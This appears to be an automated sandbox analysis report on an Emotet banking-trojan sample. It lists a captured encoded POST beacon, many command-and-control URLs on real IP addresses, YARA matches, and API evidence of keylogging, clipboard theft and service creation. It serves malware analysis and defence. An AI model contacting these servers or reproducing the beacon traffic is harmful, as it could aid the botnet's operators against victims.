Source: unknownHTTP traffic detected: POST /dIcDsclHnHkYC8AHTsU HTTP/1.1Referer: http://45.56.88.91/dIcDsclHnHkYC8AHTsUContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.56.88.91:443Content-Length: 606Connection: Keep-AliveCache-Control: no-cacheData Raw: 64 49 63 44 73 63 6c 48 6e 48 6b 59 43 38 41 48 54 73 55 3d 55 6a 4c 62 58 53 6e 68 70 30 50 51 67 39 70 32 31 32 49 65 69 68 36 63 4e 55 46 38 54 48 52 63 44 50 69 6a 63 69 59 73 53 6e 67 6d 41 44 65 77 52 53 64 68 66 52 46 38 36 71 4d 53 58 62 56 68 50 70 48 4a 61 6c 44 42 57 6d 6d 49 46 76 77 35 74 57 69 78 33 30 7a 75 6b 33 71 35 47 78 6e 4e 69 79 59 6b 77 7a 79 57 37 59 45 35 57 61 56 6e 65 4d 77 70 45 52 6a 39 55 4f 6f 49 50 72 6f 53 64 33 74 76 6d 31 42 33 75 46 4f 25 32 42 73 49 67 42 4d 6e 25 32 46 70 75 4e 72 51 25 32 46 30 41 5a 61 79 6c 6b 62 37 63 4c 62 64 75 51 71 4a 6b 65 53 43 42 79 46 6a 54 4e 72 35 42 4c 6d 74 4a 58 47 4c 49 46 35 38 73 71 6a 63 59 6d 46 42 36 6d 54 76 45 52 55 57 50 48 75 25 32 42 51 34 34 47 4f 45 42 6d 63 70 5a 39 32 57 77 4c 71 70 57 74 77 4e 72 7a 43 75 76 55 74 53 37 52 59 76 4c 6d 35 58 56 37 45 25 32 42 35 4c 36 53 73 4c 37 43 78 71 69 59 6b 69 4d 33 41 68 50 46 65 4e 25 32 42 79 57 65 6b 65 69 47 73 55 4f 66 73 59 56 61 6c 72 36 43 4d 31 52 4b 6a 53 6b 48 48 75 4f 31 71 41 48 37 43 78 42 74 32 65 77 58 25 32 46 46 35 39 41 73 25 32 42 75 36 6b 6a 47 6b 69 69 56 69 47 30 78 72 4e 61 32 70 48 39 64 7a 55 59 74 6e 32 59 53 53 62 47 34 4a 34 32 39 4e 4d 34 36 50 49 67 31 54 31 71 43 52 30 51 71 39 35 39 79 44 33 43 32 65 63 44 6b 79 50 39 4e 38 25 32 42 4e 46 50 79 50 44 6e 67 4d 76 49 58 71 79 6b 48 4b 59 54 6a 49 42 45 38 4d 72 6a 4a 74 71 45 25 32 46 77 35 63 55 31 77 70 4c 30 30 31 65 70 45 25 32 42 65 70 56 30 70 39 6d 48 38 47 73 53 67 57 73 69 37 39 38 6c 4b 75 30 73 25 32 42 75 66 34 69 71 6b 77 35 77 66 34 7a 77 41 73 58 6d 75 6f 66 4f 66 75 48 4f 4f 25 32 42 52 49 53 62 41 5a 6d 6e 63 78 36 47 53 34 52 38 58 49 31 4e 4f 63 6e 4b 55 6e 6a 68 52 37 55 42 6c 4a 7a 52 52 75 71 4e 69 47 37 37 6e 49 34 61 31 59 66 67 50 58 32 50 44 4d 47 45 77 Data Ascii: dIcDsclHnHkYC8AHTsU=UjLbXSnhp0PQg9p212Ieih6cNUF8THRcDPijciYsSngmADewRSdhfRF86qMSXbVhPpHJalDBWmmIFvw5tWix30zuk3q5GxnNiyYkwzyW7YE5WaVneMwpERj9UOoIProSd3tvm1B3uFO%2BsIgBMn%2FpuNrQ%2F0AZaylkb7cLbduQqJkeSCByFjTNr5BLmtJXGLIF58sqjcYmFB6mTvERUWPHu%2BQ44GOEBmcpZ92WwLqpWtwNrzCuvUtS7RYvLm5XV7E%2B5L6SsL7CxqiYkiM3AhPFeN%2ByWekeiGsUOfsYValr6CM1RKjSkHHuO1qAH7CxBt2ewX%2FF59As%2Bu6kjGkiiViG0xrNa2pH9dzUYtn2YSSbG4J429NM46PIg1T1qCR0Qq959yD3C2ecDkyP9N8%2BNFPyPDngMvIXqykHKYTjIBE8MrjJtqE%2Fw5cU1wpL001epE%2BepV0p9mH8GsSgWsi798lKu0s%2Buf4iqkw5wf4zwAsXmuofOfuHOO%2BRISbAZmncx6GS4R8XI1NOcnKUnjhR7UBlJzRRuqNiG77nI4a1YfgPX2PDMGEw
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Feb 2020 08:33:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Urls found in memory or binary dataShow sources
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://107.2.2.28/FpU6cre
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://186.75.241.230/8HPGE9
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://186.75.241.230/8HPGE9bD
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://190.12.119.180:443/tovm2Xky7BQG8IM
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://206.81.10.215:8080/bAvwkbq
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://206.81.10.215:8080/bAvwkbq6
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://206.81.10.215:8080/bAvwkbq8
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://206.81.10.215:8080/bAvwkbqP
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://206.81.10.215:8080/bAvwkbqp
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://45.56.88.91:443/dIcDsclHnHkYC8AHTsU
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUa
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUu
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUy
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://47.50.251.130/HLHvQpx
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://47.50.251.130/HLHvQpx/
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://47.50.251.130/HLHvQpxstemprofile
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://51.68.220.244/THUbD
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://51.68.220.244:8080/THUbD
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRH
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRH)
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRH0
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRH=
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRHM
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRHONVf
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmpString found in binary or memory: http://59.110.18.236:443/kwTaaZ8qRHU2
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboardShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00409870 OpenClipboard,1_2_00409870
Contains functionality to read the clipboard dataShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00407300 GetClipboardData,CloseClipboard,1_2_00407300
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0044CA05 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,1_2_0044CA05
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00450DD1 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,1_2_00450DD1
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0040CEC5 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,1_2_0040CEC5
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0044D331 GetKeyState,GetKeyState,GetKeyState,1_2_0044D331
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0044CA05 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,4_2_0044CA05
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00450DD1 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,4_2_00450DD1
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0040CEC5 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,4_2_0040CEC5
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0044D331 GetKeyState,GetKeyState,GetKeyState,4_2_0044D331
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00411DC8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,4_2_00411DC8

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022BDE9C4_2_022BDE9C
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F9DE9C8_2_00F9DE9C
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,4_2_022B1F75
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F91F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,8_2_00F91F75

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000001.00000002.2129758343.0000000002251000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000004.00000002.2217330975.00000000022B1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00402E90 NtAllocateVirtualMemory,1_2_00402E90
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00402E90 NtAllocateVirtualMemory,4_2_00402E90
Contains functionality to delete servicesShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022BE068 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,4_2_022BE068
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B1D2B CreateProcessAsUserW,CreateProcessW,4_2_022B1D2B
Creates files inside the system directoryShow sources
Source: C:\Windows\SysWOW64\leelsensor.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
Deletes files inside the Windows folderShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeFile deleted: C:\Windows\SysWOW64\leelsensor.exe:Zone.IdentifierJump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004540901_2_00454090
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004022701_2_00402270
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004624891_2_00462489
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_0045449C1_2_0045449C
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004646611_2_00464661
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004548BC1_2_004548BC
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004629CD1_2_004629CD
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00458CB71_2_00458CB7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00416F811_2_00416F81
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004630C51_2_004630C5
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004537E71_2_004537E7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_004138F61_2_004138F6
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00453CBC1_2_00453CBC
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004540904_2_00454090
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004022704_2_00402270
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004624894_2_00462489
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_0045449C4_2_0045449C
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004646614_2_00464661
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004548BC4_2_004548BC
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004629CD4_2_004629CD
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00458CB74_2_00458CB7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00416F814_2_00416F81
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004630C54_2_004630C5
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004537E74_2_004537E7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_004138F64_2_004138F6
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00453CBC4_2_00453CBC
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00461F454_2_00461F45
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022928C14_2_022928C1
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022930E84_2_022930E8
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022930E44_2_022930E4
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B37A94_2_022B37A9
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B37A54_2_022B37A5
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B2F824_2_022B2F82
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F630E45_2_00F630E4
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F630E85_2_00F630E8
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F628C15_2_00F628C1
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F837A95_2_00F837A9
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F837A55_2_00F837A5
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 5_2_00F82F825_2_00F82F82
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F730E48_2_00F730E4
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F730E88_2_00F730E8
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F728C18_2_00F728C1
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F937A98_2_00F937A9
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F937A58_2_00F937A5
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F92F828_2_00F92F82
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 00409E10 appears 68 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 00453475 appears 85 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 004586AC appears 45 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 00418788 appears 48 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 0045340C appears 537 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 004534AB appears 33 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 00401510 appears 63 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 00419804 appears 165 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 004534E4 appears 45 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 0045343F appears 240 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 00453220 appears 116 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: String function: 0041880C appears 37 times
PE file contains strange resourcesShow sources
Source: n5hhkdky_exe.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: n5hhkdky_exe.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: n5hhkdky_exe.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: n5hhkdky_exe.exe, 00000001.00000002.2129193086.00000000004A5000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVisual Editor.EXEF vs n5hhkdky_exe.exe
Source: n5hhkdky_exe.exe, 00000004.00000002.2216734226.00000000004A5000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVisual Editor.EXEF vs n5hhkdky_exe.exe
Source: n5hhkdky_exe.exe, 00000004.00000002.2217460089.00000000023F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs n5hhkdky_exe.exe
Source: n5hhkdky_exe.exe, 00000004.00000002.2217460089.00000000023F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs n5hhkdky_exe.exe
Source: n5hhkdky_exe.exe, 00000004.00000002.2219862669.0000000003080000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs n5hhkdky_exe.exe
Source: n5hhkdky_exe.exeBinary or memory string: OriginalFilenameVisual Editor.EXEF vs n5hhkdky_exe.exe
Yara signature matchShow sources
Source: 00000001.00000002.2129758343.0000000002251000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.2217330975.00000000022B1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@7/1@0/9
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00429CCC __EH_prolog3_GS,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,_DebugHeapAllocator,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,1_2_00429CCC
Contains functionality to create servicesShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_022BE138
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,8_2_00F9E138
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B1943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,4_2_022B1943
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00416CBB __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,_DebugHeapAllocator,CoInitializeEx,CoCreateInstance,1_2_00416CBB
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00401730 FindResourceA,1_2_00401730
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022BE138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_022BE138
Creates mutexesShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M66FC9C52
Source: C:\Windows\SysWOW64\leelsensor.exeMutant created: \BaseNamedObjects\Global\M66FC9C52
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I66FC9C52
Source: C:\Windows\SysWOW64\leelsensor.exeMutant created: \BaseNamedObjects\Global\I66FC9C52
PE file has an executable .text section and no other executable sectionShow sources
Source: n5hhkdky_exe.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: n5hhkdky_exe.exeVirustotal: Detection: 78%
Source: n5hhkdky_exe.exeMetadefender: Detection: 62%
Source: n5hhkdky_exe.exeReversingLabs: Detection: 80%
Sample requires command line parameters (based on API chain)Show sources
